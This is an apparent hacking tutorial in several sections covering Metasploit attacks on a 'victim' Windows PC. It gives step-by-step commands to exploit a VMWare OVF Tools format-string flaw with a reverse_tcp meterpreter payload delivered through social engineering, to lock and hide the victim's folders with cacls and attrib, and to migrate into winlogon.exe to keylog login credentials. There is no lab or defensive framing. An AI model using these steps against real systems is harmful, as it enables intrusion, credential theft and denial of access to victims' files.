How to Lock/Unlock Folder in Remote Victim PC using Metasploit

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type Cacls (Folder Name) /e /p everyone:n and press Enter.

This will lock your “Movies Folder” folder from D drive

If you want to unlock the folder you may just change the parameters

For unlock Cacls (Folder Name) /e /p everyone:f

Hack Remote Windows PC using VMWare OVF Tools Format String Vulnerability

This module exploits format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Exploit Targets

VMWare OVF Tools 2.1


Attacker: Backtrack 5

Victim PC: Windows XP SP 2

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ovftool_format_string

msf exploit (ovftool_format_string)>set payload windows/meterpreter/reverse_tcp

msf exploit (ovftool_format_string)>set lhost (IP of Local Host)

msf exploit (ovftool_format_string)>set srvhost (This must be an address on the local machine)

msf exploit (ovftool_format_string)>set uripath / (The Url to use for this exploit)

msf exploit (ovftool_format_string)>exploit

Now an URL you should give to your victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

How to Hide File in Remote Victim PC

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type attrib +h +r +s (drive name) d:/Folder Name and press Enter button to activate it.

This will hide your “Video Folder” folder from D drive. No one can unhide this folder using “Show hidden files and folders” option also

If you want to unhide the folder you may just change the parameters from ‘+’ to ‘-’ :-

attrib example -s –h

For unhide attrib -h -r -s (drive name) d:/Foldername

Hack Remote Windows Password using Keylogger in Meterpreter

Once you got the meterpreter session use ‘ps‘ command to displays a list of running processes on the target.

The next step is we need to migrate Meterpreter to the winlogon.exe process. Victim winlogon.exe process ID is 600. Now type migrate 600 now we can start the keylogger

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

This will capture the credentials of all users logging into the system as long as this is running.